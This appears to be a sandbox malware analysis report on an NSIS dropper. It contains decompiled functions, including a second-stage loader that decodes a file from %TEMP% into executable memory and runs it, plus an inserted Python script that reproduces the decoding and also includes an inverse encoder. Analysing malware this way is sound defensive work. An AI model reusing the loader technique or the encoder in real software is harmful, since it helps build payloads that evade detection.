                												E004060F7("C:\\Users\\alfons\\AppData\\Local\\Temp", _t154);
                												 *((intOrPtr*)(_t164 + 0x10)) = 0;
                												goto L42;
                											}
                											_t110 = (( *0x40a15b << 0x00000008 |  *0x40a15a) << 0x00000008 |  *0x40a159) << 0x00000008 | " _?=";
                											while( *_t153 != _t110) {
                												_t153 = _t153 - 1;
                												if(_t153 >= _t160) {
                													continue;
                												}
                												goto L39;
                											}
                											goto L39;
                										}
                										GetWindowsDirectoryA(_t157, 0x3fb);
                										lstrcatA(_t157, "\\Temp");
                										_t113 = E00403317(_t173);
                										_t174 = _t113;
                										if(_t113 != 0) {
                											goto L33;
                										}
                										GetTempPathA(0x3fc, _t157);
                										lstrcatA(_t157, "Low");
                										SetEnvironmentVariableA("TEMP", _t157);
                										SetEnvironmentVariableA("TMP", _t157);
                										_t118 = E00403317(_t174);
                										_t175 = _t118;
                										if(_t118 == 0) {
                											goto L43;
                										}
                										goto L33;
                									}
                									goto L25;
                								}
                								_t141 = _t55[4];
                								__eflags = _t141 - 0x20;
                								if(_t141 == 0x20) {
                									L23:
                									_t15 = _t164 + 0x20;
                									 *_t15 =  *(_t164 + 0x20) | 0x00000004;
                									__eflags =  *_t15;
                									goto L24;
                								}
                								__eflags = _t141;
                								if(_t141 != 0) {
                									goto L24;
                								}
                								goto L23;
                							}
                							_t142 = _t55[1];
                							__eflags = _t142 - 0x20;
                							if(_t142 == 0x20) {
                								L19:
                								 *0x42f4e0 = 1;
                								goto L20;
                							}
                							__eflags = _t142;
                							if(_t142 != 0) {
                								goto L20;
                							}
                							goto L19;
                						}
                					} else {
                						goto L12;
                					}
                					do {
                						L12:
                						_t55 =  &(_t55[1]);
                						__eflags =  *_t55 - 0x20;
                					} while ( *_t55 == 0x20);
                					goto L13;
                				}
                				goto L30;
                			}

                (Address column of the disassembly view, separated from the C listing above by extraction: one instruction address per decompiled line of _entry_, ranging from 0x00403358 to 0x0040382a; the 0x00000000 entries carry no instruction address.)
                0x00000000
                0x0040363e
                0x00403649
                0x0040364e
                0x00000000
                0x0040364e
                0x00403612
                0x00403614
                0x00403618
                0x0040361b
                0x00000000
                0x00000000
                0x00000000
                0x0040361b
                0x00000000
                0x00403614
                0x00403564
                0x00403570
                0x00403575
                0x0040357a
                0x0040357c
                0x00000000
                0x00000000
                0x00403584
                0x0040358c
                0x0040359d
                0x004035a5
                0x004035a7
                0x004035ac
                0x004035ae
                0x00000000
                0x00000000
                0x00000000
                0x004035ae
                0x00000000
                0x00403513
                0x004034d4
                0x004034d7
                0x004034da
                0x004034e0
                0x004034e0
                0x004034e0
                0x004034e0
                0x00000000
                0x004034e0
                0x004034dc
                0x004034de
                0x00000000
                0x00000000
                0x00000000
                0x004034de
                0x0040348f
                0x00403492
                0x00403495
                0x0040349b
                0x0040349b
                0x00000000
                0x0040349b
                0x00403497
                0x00403499
                0x00000000
                0x00000000
                0x00000000
                0x00403499
                0x00000000
                0x00000000
                0x00000000
                0x0040346a
                0x0040346a
                0x0040346a
                0x0040346b
                0x0040346b
                0x00000000
                0x0040346a
                0x00000000

                APIs
                • SetErrorMode.KERNELBASE ref: 0040336D
                • GetVersion.KERNEL32 ref: 00403373
                • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033A6
                • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 004033E2
                • OleInitialize.OLE32(00000000), ref: 004033E9
                • SHGetFileInfoA.SHELL32(00429850,00000000,?,00000160,00000000,?,00000007,00000009,0000000B), ref: 00403405
                • GetCommandLineA.KERNEL32(Template Method Pattern Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 0040341A
                • CharNextA.USER32(00000000,"C:\Users\user\Desktop\bGf2H3tXGg.exe" ,00000020,"C:\Users\user\Desktop\bGf2H3tXGg.exe" ,00000000,?,00000007,00000009,0000000B), ref: 00403456
                • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000007,00000009,0000000B), ref: 00403553
                • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 00403564
                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403570
                • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403584
                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040358C
                • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040359D
                • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004035A5
                • DeleteFileA.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 004035B9
                  • Part of subcall function 00406500: GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
                  • Part of subcall function 00406500: GetProcAddress.KERNEL32(00000000,?), ref: 0040652D
                  • Part of subcall function 0040390A: GetUserDefaultUILanguage.KERNELBASE(00000002,7519FA90,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\bGf2H3tXGg.exe" ,00000000), ref: 00403924
                  • Part of subcall function 0040390A: lstrlenA.KERNEL32(Cgrlcpdlsle,?,?,?,Cgrlcpdlsle,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000,00000002,7519FA90), ref: 004039FA
                  • Part of subcall function 0040390A: lstrcmpiA.KERNEL32(?,.exe,Cgrlcpdlsle,?,?,?,Cgrlcpdlsle,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000), ref: 00403A0D
                  • Part of subcall function 0040390A: GetFileAttributesA.KERNEL32(Cgrlcpdlsle), ref: 00403A18
                  • Part of subcall function 0040390A: LoadImageA.USER32 ref: 00403A61
                  • Part of subcall function 0040390A: RegisterClassA.USER32 ref: 00403A9E
                  • Part of subcall function 00403830: CloseHandle.KERNEL32(000002BC,00403667,?,?,00000007,00000009,0000000B), ref: 0040383B
                • OleUninitialize.OLE32(?,?,00000007,00000009,0000000B), ref: 00403667
                • ExitProcess.KERNEL32 ref: 00403688
                • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000009,0000000B), ref: 004037A5
                • OpenProcessToken.ADVAPI32(00000000), ref: 004037AC
                • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004037C4
                • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004037E3
                • ExitWindowsEx.USER32 ref: 00403807
                • ExitProcess.KERNEL32 ref: 0040382A
                  • Part of subcall function 00405813: MessageBoxIndirectA.USER32 ref: 0040586E
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp
                Similarity
                • API ID: Process$ExitFile$EnvironmentHandlePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDefaultDeleteDirectoryErrorImageIndirectInfoInitializeLanguageLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeUserValueVersionlstrcmpi
                • String ID: "$"C:\Users\user\Desktop\bGf2H3tXGg.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\bGf2H3tXGg.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$Template Method Pattern Setup$UXTHEME$\Temp$~nsu
                • API String ID: 1314998376-3452680007
                • Opcode ID: 92f4727230b5494df4ae19d242d75775fcc962e9ce705fe20936cac325b27094
                • Instruction ID: 2464a3ec660faf4d6335bd380e0cd13b62da1685a36c15adf6e00eeeb0483762
                • Opcode Fuzzy Hash: 92f4727230b5494df4ae19d242d75775fcc962e9ce705fe20936cac325b27094
                • Instruction Fuzzy Hash: 49C107705047416AD7216F759D89B2F3EACAB4530AF45443FF181BA2E2CB7C8A058B2F
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 98%
                			E004058BF(void* __eflags, signed int _a4, signed int _a8) {
                				signed int _v8;
                				void* _v12;
                				signed int _v16;
                				struct _WIN32_FIND_DATAA _v336;
                				signed int _t40;
                				char* _t53;
                				signed int _t55;
                				signed int _t58;
                				signed int _t64;
                				signed int _t66;
                				void* _t68;
                				signed char _t69;
                				CHAR* _t71;
                				void* _t72;
                				CHAR* _t73;
                				char* _t76;
                
                				_t69 = _a8;
                				_t73 = _a4;
                				_v8 = _t69 & 0x00000004;
                				_t40 = E00405B7D(__eflags, _t73);
                				_v16 = _t40;
                				if((_t69 & 0x00000008) != 0) {
                					_t66 = DeleteFileA(_t73); // executed
                					asm("sbb eax, eax");
                					_t68 =  ~_t66 + 1;
                					 *0x42f4c8 =  *0x42f4c8 + _t68;
                					return _t68;
                				}
                				_a4 = _t69;
                				_t8 =  &_a4;
                				 *_t8 = _a4 & 0x00000001;
                				__eflags =  *_t8;
                				if( *_t8 == 0) {
                					L5:
                					E004060F7(0x42b898, _t73);
                					__eflags = _a4;
                					if(_a4 == 0) {
                						E00405AD6(_t73);
                					} else {
                						lstrcatA(0x42b898, "\*.*");
                					}
                					__eflags =  *_t73;
                					if( *_t73 != 0) {
                						L10:
                						lstrcatA(_t73, 0x40a014);
                						L11:
                						_t71 =  &(_t73[lstrlenA(_t73)]);
                						_t40 = FindFirstFileA(0x42b898,  &_v336);
                						__eflags = _t40 - 0xffffffff;
                						_v12 = _t40;
                						if(_t40 == 0xffffffff) {
                							L29:
                							__eflags = _a4;
                							if(_a4 != 0) {
                								_t32 = _t71 - 1;
                								 *_t32 =  *(_t71 - 1) & 0x00000000;
                								__eflags =  *_t32;
                							}
                							goto L31;
                						} else {
                							goto L12;
                						}
                						do {
                							L12:
                							_t76 =  &(_v336.cFileName);
                							_t53 = E00405ABA( &(_v336.cFileName), 0x3f);
                							__eflags =  *_t53;
                							if( *_t53 != 0) {
                								__eflags = _v336.cAlternateFileName;
                								if(_v336.cAlternateFileName != 0) {
                									_t76 =  &(_v336.cAlternateFileName);
                								}
                							}
                							__eflags =  *_t76 - 0x2e;
                							if( *_t76 != 0x2e) {
                								L19:
                								E004060F7(_t71, _t76);
                								__eflags = _v336.dwFileAttributes & 0x00000010;
                								if(__eflags == 0) {
                									_t55 = E00405877(__eflags, _t73, _v8);
                									__eflags = _t55;
                									if(_t55 != 0) {
                										E0040521E(0xfffffff2, _t73);
                									} else {
                										__eflags = _v8 - _t55;
                										if(_v8 == _t55) {
                											 *0x42f4c8 =  *0x42f4c8 + 1;
                										} else {
                											E0040521E(0xfffffff1, _t73);
                											E00405ED6(_t72, _t73, 0);
                										}
                									}
                								} else {
                									__eflags = (_a8 & 0x00000003) - 3;
                									if(__eflags == 0) {
                										E004058BF(__eflags, _t73, _a8);
                									}
                								}
                								goto L27;
                							}
                							_t64 =  *((intOrPtr*)(_t76 + 1));
                							__eflags = _t64;
                							if(_t64 == 0) {
                								goto L27;
                							}
                							__eflags = _t64 - 0x2e;
                							if(_t64 != 0x2e) {
                								goto L19;
                							}
                							__eflags =  *((char*)(_t76 + 2));
                							if( *((char*)(_t76 + 2)) == 0) {
                								goto L27;
                							}
                							goto L19;
                							L27:
                							_t58 = FindNextFileA(_v12,  &_v336);
                							__eflags = _t58;
                						} while (_t58 != 0);
                						_t40 = FindClose(_v12);
                						goto L29;
                					}
                					__eflags =  *0x42b898 - 0x5c;
                					if( *0x42b898 != 0x5c) {
                						goto L11;
                					}
                					goto L10;
                				} else {
                					__eflags = _t40;
                					if(_t40 == 0) {
                						L31:
                						__eflags = _a4;
                						if(_a4 == 0) {
                							L39:
                							return _t40;
                						}
                						__eflags = _v16;
                						if(_v16 != 0) {
                							_t40 = E0040646B(_t73);
                							__eflags = _t40;
                							if(_t40 == 0) {
                								goto L39;
                							}
                							E00405A8F(_t73);
                							_t40 = E00405877(__eflags, _t73, _v8 | 0x00000001);
                							__eflags = _t40;
                							if(_t40 != 0) {
                								return E0040521E(0xffffffe5, _t73);
                							}
                							__eflags = _v8;
                							if(_v8 == 0) {
                								goto L33;
                							}
                							E0040521E(0xfffffff1, _t73);
                							return E00405ED6(_t72, _t73, 0);
                						}
                						L33:
                						 *0x42f4c8 =  *0x42f4c8 + 1;
                						return _t40;
                					}
                					__eflags = _t69 & 0x00000002;
                					if((_t69 & 0x00000002) == 0) {
                						goto L31;
                					}
                					goto L5;
                				}
                			}

                0x004058c9
                0x004058ce
                0x004058d7
                0x004058da
                0x004058e2
                0x004058e5
                0x004058e8
                0x004058f0
                0x004058f2
                0x004058f3
                0x00000000
                0x004058f3
                0x004058fe
                0x00405901
                0x00405901
                0x00405901
                0x00405905
                0x00405918
                0x0040591f
                0x00405924
                0x00405928
                0x00405938
                0x0040592a
                0x00405930
                0x00405930
                0x0040593d
                0x00405940
                0x0040594b
                0x00405951
                0x00405956
                0x00405966
                0x00405968
                0x0040596e
                0x00405971
                0x00405974
                0x00405a2c
                0x00405a2c
                0x00405a30
                0x00405a32
                0x00405a32
                0x00405a32
                0x00405a32
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0040597a
                0x0040597a
                0x00405983
                0x00405989
                0x0040598e
                0x00405991
                0x00405993
                0x00405997
                0x00405999
                0x00405999
                0x00405997
                0x0040599c
                0x0040599f
                0x004059b2
                0x004059b4
                0x004059b9
                0x004059c0
                0x004059db
                0x004059e0
                0x004059e2
                0x00405a06
                0x004059e4
                0x004059e4
                0x004059e7
                0x004059fb
                0x004059e9
                0x004059ec
                0x004059f4
                0x004059f4
                0x004059e7
                0x004059c2
                0x004059c8
                0x004059ca
                0x004059d0
                0x004059d0
                0x004059ca
                0x00000000
                0x004059c0
                0x004059a1
                0x004059a4
                0x004059a6
                0x00000000
                0x00000000
                0x004059a8
                0x004059aa
                0x00000000
                0x00000000
                0x004059ac
                0x004059b0
                0x00000000
                0x00000000
                0x00000000
                0x00405a0b
                0x00405a15
                0x00405a1b
                0x00405a1b
                0x00405a26
                0x00000000
                0x00405a26
                0x00405942
                0x00405949
                0x00000000
                0x00000000
                0x00000000
                0x00405907
                0x00405907
                0x00405909
                0x00405a36
                0x00405a38
                0x00405a3b
                0x00405a8c
                0x00405a8c
                0x00405a8c
                0x00405a3d
                0x00405a40
                0x00405a4b
                0x00405a50
                0x00405a52
                0x00000000
                0x00000000
                0x00405a55
                0x00405a61
                0x00405a66
                0x00405a68
                0x00000000
                0x00405a83
                0x00405a6a
                0x00405a6d
                0x00000000
                0x00000000
                0x00405a72
                0x00000000
                0x00405a79
                0x00405a42
                0x00405a42
                0x00000000
                0x00405a42
                0x0040590f
                0x00405912
                0x00000000
                0x00000000
                0x00000000
                0x00405912

                APIs
                • DeleteFileA.KERNELBASE(?,?,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058E8
                • lstrcatA.KERNEL32(0042B898,\*.*,0042B898,?,?,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405930
                • lstrcatA.KERNEL32(?,0040A014,?,0042B898,?,?,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405951
                • lstrlenA.KERNEL32(?,?,0040A014,?,0042B898,?,?,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405957
                • FindFirstFileA.KERNEL32(0042B898,?,?,?,0040A014,?,0042B898,?,?,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405968
                • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405A15
                • FindClose.KERNEL32(00000000), ref: 00405A26
                Strings
                • C:\Users\user\AppData\Local\Temp\, xrefs: 004058CC
                • \*.*, xrefs: 0040592A
                • "C:\Users\user\Desktop\bGf2H3tXGg.exe" , xrefs: 004058BF
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp
                Similarity
                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                • String ID: "C:\Users\user\Desktop\bGf2H3tXGg.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                • API String ID: 2035342205-3891894385
                • Opcode ID: c5c9cbc54ac5a0b6362327b9ac4809c8afb714a0d61d87f2a5b8dc3e2328684f
                • Instruction ID: 53fbf83e18d3e9f22f7fd61ce8145b7df245fbcc76992db59ab4b54644bc6f5f
                • Opcode Fuzzy Hash: c5c9cbc54ac5a0b6362327b9ac4809c8afb714a0d61d87f2a5b8dc3e2328684f
                • Instruction Fuzzy Hash: 4251C470A00A49AADB21AB618D85BBF7A78DF52314F14427FF841711D2C73C8942DF6A
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 79%
                			E10001140() {
                				signed int _v5;
                				struct _OVERLAPPED* _v12;
                				void* _v16;
                				long _v20;
                				long _v24;
                				void* _v28;
                				short _v548;
                				long _t55;
                				void* _t57;
                				long _t59;
                				void* _t60;
                				int _t62;
                
                				_v12 = 0;
                				_v24 = 0;
                				if(IsDebuggerPresent() != 0) {
                					DebugBreak();
                				}
                				E10001000();
                				_t55 = GetTempPathW(0x103,  &_v548);
                				if(_t55 != 0) {
                					lstrcatW( &_v548, 0x10003000);
                					_t57 = CreateFileW( &_v548, 0x80000000, 7, 0, 3, 0x80, 0); // executed
                					_v16 = _t57;
                					if(_v16 != 0xffffffff) {
                						_t59 = GetFileSize(_v16, 0);
                						_v20 = _t59;
                						if(_v20 != 0xffffffff) {
                							_t60 = VirtualAlloc(0, _v20, 0x3000, 0x40); // executed
                							 *0x1000302c = _t60;
                							if( *0x1000302c != 0) {
                								_t62 = ReadFile(_v16,  *0x1000302c, _v20,  &_v24, 0); // executed
                								if(_t62 != 0) {
                									FindCloseChangeNotification(_v16); // executed
                									_v12 = 0;
                									while(_v12 < _v24) {
                										_v5 =  *((intOrPtr*)( *0x1000302c + _v12));
                										_v5 = (_v5 & 0x000000ff) - 0x3d;
                										_v5 = _v5 & 0x000000ff ^ 0x00000007;
                										_v5 = (_v5 & 0x000000ff) >> 0x00000001 | (_v5 & 0x000000ff) << 0x00000007;
                										_v5 = (_v5 & 0x000000ff) - _v12;
                										_v5 =  !(_v5 & 0x000000ff);
                										_v5 = (_v5 & 0x000000ff) - _v12;
                										_v5 = _v5 & 0x000000ff ^ 0x000000d1;
                										_v5 = _v12 + (_v5 & 0x000000ff);
                										_v5 = _v5 & 0x000000ff ^ 0x00000093;
                										_v5 = (_v5 & 0x000000ff) + 0x44;
                										 *((char*)( *0x1000302c + _v12)) = _v5;
                										_v12 =  &(_v12->Internal);
                									}
                									_v28 =  *0x1000302c;
                									 *0x100020a4(); // executed
                									return _v28();
                								}
                								return _t62;
                							}
                							return _t60;
                						}
                						return _t59;
                					}
                					return _t57;
                				} else {
                					return _t55;
                				}
                			}

                0x10001149
                0x10001150
                0x1000115f
                0x10001161
                0x10001161
                0x10001167
                0x10001178
                0x10001180
                0x10001193
                0x100011b2
                0x100011b8
                0x100011bf
                0x100011cc
                0x100011d2
                0x100011d9
                0x100011ed
                0x100011f3
                0x100011ff
                0x1000121b
                0x10001223
                0x1000122e
                0x10001234
                0x10001246
                0x1000125c
                0x10001266
                0x10001270
                0x10001282
                0x1000128c
                0x10001295
                0x1000129f
                0x100012ab
                0x100012b5
                0x100012c2
                0x100012cc
                0x100012db
                0x10001243
                0x10001243
                0x100012e7
                0x100012ed
                0x00000000
                0x100012f3
                0x00000000
                0x10001223
                0x00000000
                0x100011ff
                0x00000000
                0x100011d9
                0x00000000
                0x00000000
                0x00000000
                0x00000000

                APIs
                • IsDebuggerPresent.KERNEL32 ref: 10001157
                • DebugBreak.KERNEL32 ref: 10001161
                • GetTempPathW.KERNEL32(00000103,?), ref: 10001178
                • lstrcatW.KERNEL32(?,10003000), ref: 10001193
                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 100011B2
                • GetFileSize.KERNEL32(000000FF,00000000), ref: 100011CC
                Memory Dump Source
                • Source File: 00000000.00000002.256047878.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                • Associated: 00000000.00000002.256041003.0000000010000000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.256053495.0000000010002000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.256060050.0000000010004000.00000002.00020000.sdmp
                Similarity
                • API ID: File$BreakCreateDebugDebuggerPathPresentSizeTemplstrcat
                • String ID:
                • API String ID: 3387724011-0
                • Opcode ID: 654d6cc6bda687c2126d4e8120b40575b06e360e86480a58b1eab55cdbf9aa21
                • Instruction ID: 1b8f206140e46b40f8892c82d4497af35837fa909e52085900f9582b4d9b2705
                • Opcode Fuzzy Hash: 654d6cc6bda687c2126d4e8120b40575b06e360e86480a58b1eab55cdbf9aa21
                • Instruction Fuzzy Hash: BD517570D08399EFEB05CBF4C898BEDBFB4EF09381F048199E551A6286C6755749CB21
                Uniqueness

                Uniqueness Score: -1.00%
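The function E10001140 above is the second-stage loader: it reads a file from %TEMP% into a PAGE_EXECUTE_READWRITE buffer (VirtualAlloc with 0x40), rewrites every byte with a fixed sequence of add/xor/rotate/not operations keyed on the byte offset, and then calls the buffer directly. The script below is an added example, not code from the sample or from this report; it re-implements that per-byte loop (0x10001246 to 0x100012db) so the dropped file can be decoded offline without running it. Assumptions: the file name appended from 0x10003000 is not shown on this page, so the path is taken as a command-line argument; encode_payload is the mathematical inverse written only to build test input; looks_like_pe is a heuristic added here, since the buffer is called as raw code and need not start with a PE header.

```python
"""Offline re-implementation of the byte transform in E10001140 (added example).

Decoded bytes are what the DLL hands to the call at the end of the function,
so the output is the second stage as it exists in memory right before execution.
"""
import sys


def _ror8(v: int, n: int = 1) -> int:
    # 8-bit rotate right, matching "(v >> 1) | (v << 7)" on a byte
    v &= 0xFF
    return ((v >> n) | (v << (8 - n))) & 0xFF


def _rol8(v: int, n: int = 1) -> int:
    # 8-bit rotate left, inverse of _ror8 (only needed by encode_byte)
    v &= 0xFF
    return ((v << n) | (v >> (8 - n))) & 0xFF


def decode_byte(b: int, i: int) -> int:
    """One loop iteration: byte b found at offset i of the dropped file.

    The decompiler subtracts the full 32-bit counter, but the value lives in an
    8-bit variable, so only the low byte of the offset ever matters.
    """
    v = (b - 0x3D) & 0xFF
    v ^= 0x07
    v = _ror8(v)
    v = (v - i) & 0xFF
    v = (~v) & 0xFF
    v = (v - i) & 0xFF
    v ^= 0xD1
    v = (v + i) & 0xFF
    v ^= 0x93
    v = (v + 0x44) & 0xFF
    return v


def encode_byte(b: int, i: int) -> int:
    """Inverse of decode_byte (assumed helper for tests; the sample has no encoder)."""
    v = (b - 0x44) & 0xFF
    v ^= 0x93
    v = (v - i) & 0xFF
    v ^= 0xD1
    v = (v + i) & 0xFF
    v = (~v) & 0xFF
    v = (v + i) & 0xFF
    v = _rol8(v)
    v ^= 0x07
    v = (v + 0x3D) & 0xFF
    return v


def decode_payload(data: bytes) -> bytes:
    """Apply the loader's transform to a whole file image."""
    return bytes(decode_byte(b, i) for i, b in enumerate(data))


def encode_payload(data: bytes) -> bytes:
    """Inverse transform, used to produce constructed test input."""
    return bytes(encode_byte(b, i) for i, b in enumerate(data))


def looks_like_pe(data: bytes) -> bool:
    """Heuristic only: MZ header with an e_lfanew pointing at a PE signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return 0x40 <= e_lfanew < len(data) - 4 and data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


if __name__ == "__main__":
    # usage: python decode_stage2.py <dropped file from %TEMP%> <output file>
    with open(sys.argv[1], "rb") as f:
        decoded = decode_payload(f.read())
    with open(sys.argv[2], "wb") as f:
        f.write(decoded)
    print("decoded %d bytes, PE header present: %s" % (len(decoded), looks_like_pe(decoded)))
```

Because every step is a bijection on a byte, the transform is trivially reversible, which is why the same routine can serve as a YARA-independent check: decode the candidate file and look for a PE header or a known shellcode prologue in the first bytes. The unresolved import called through 0x100020a4 just before the buffer is invoked is not shown on this page and is not modelled here.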

                C-Code - Quality: 100%
                			E0040646B(CHAR* _a4) {
                				void* _t2;
                
                				_t2 = FindFirstFileA(_a4, 0x42c0e0); // executed
                				if(_t2 == 0xffffffff) {
                					return 0;
                				}
                				FindClose(_t2);
                				return 0x42c0e0;
                			}

                0x00406476
                0x0040647f
                0x00000000
                0x0040648c
                0x00406482
                0x00000000

                APIs
                • FindFirstFileA.KERNELBASE(7519FA90,0042C0E0,0042BC98,00405BC0,0042BC98,0042BC98,00000000,0042BC98,0042BC98,7519FA90,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,7519FA90,C:\Users\user\AppData\Local\Temp\), ref: 00406476
                • FindClose.KERNEL32(00000000), ref: 00406482
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp
                Similarity
                • API ID: Find$CloseFileFirst
                • String ID:
                • API String ID: 2295610775-0
                • Opcode ID: 834111d6c5cf34f6f1a5acdd2360b111687db49f4aa82fd60f9155d80f0d726b
                • Instruction ID: 43645372537bfa69987f3f85d1e9d0a1072f39b89fcefe97c81bac3be47e5bfd
                • Opcode Fuzzy Hash: 834111d6c5cf34f6f1a5acdd2360b111687db49f4aa82fd60f9155d80f0d726b
                • Instruction Fuzzy Hash: 9AD01231514120DFC3502B786D4C84F7A589F05330321CB36F86AF22E0C7348C2296EC
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 96%
                			E0040390A(void* __eflags) {
                				intOrPtr _v4;
                				intOrPtr _v8;
                				int _v12;
                				void _v16;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				intOrPtr* _t17;
                				void* _t25;
                				void* _t27;
                				int _t28;
                				void* _t31;
                				int _t34;
                				int _t35;
                				intOrPtr _t36;
                				int _t39;
                				char _t57;
                				CHAR* _t59;
                				signed char _t63;
                				signed short _t67;
                				CHAR* _t74;
                				intOrPtr _t76;
                				CHAR* _t81;
                
                				_t76 =  *0x42f434;
                				_t17 = E00406500(2);
                				_t84 = _t17;
                				if(_t17 == 0) {
                					_t74 = 0x42a890;
                					"1033" = 0x30;
                					 *0x436001 = 0x78;
                					 *0x436002 = 0;
                					E00405FDE(_t71, __eflags, 0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x42a890, 0);
                					__eflags =  *0x42a890;
                					if(__eflags == 0) {
                						E00405FDE(_t71, __eflags, 0x80000003, ".DEFAULT\\Control Panel\\International",  &M0040836A, 0x42a890, 0);
                					}
                					lstrcatA("1033", _t74);
                				} else {
                					_t67 =  *_t17(); // executed
                					E00406055("1033", _t67 & 0x0000ffff);
                				}
                				E00403BCF(_t71, _t84);
                				_t80 = "C:\\Users\\alfons\\AppData\\Local\\Temp";
                				 *0x42f4c0 =  *0x42f43c & 0x00000020;
                				 *0x42f4dc = 0x10000;
                				if(E00405B7D(_t84, "C:\\Users\\alfons\\AppData\\Local\\Temp") != 0) {
                					L16:
                					if(E00405B7D(_t92, _t80) == 0) {
                						E0040618A(0, _t74, _t76, _t80,  *((intOrPtr*)(_t76 + 0x118)));
                					}
                					_t25 = LoadImageA( *0x42f420, 0x67, 1, 0, 0, 0x8040); // executed
                					 *0x42ec08 = _t25;
                					if( *((intOrPtr*)(_t76 + 0x50)) == 0xffffffff) {
                						L21:
                						if(E0040140B(0) == 0) {
                							_t27 = E00403BCF(_t71, __eflags);
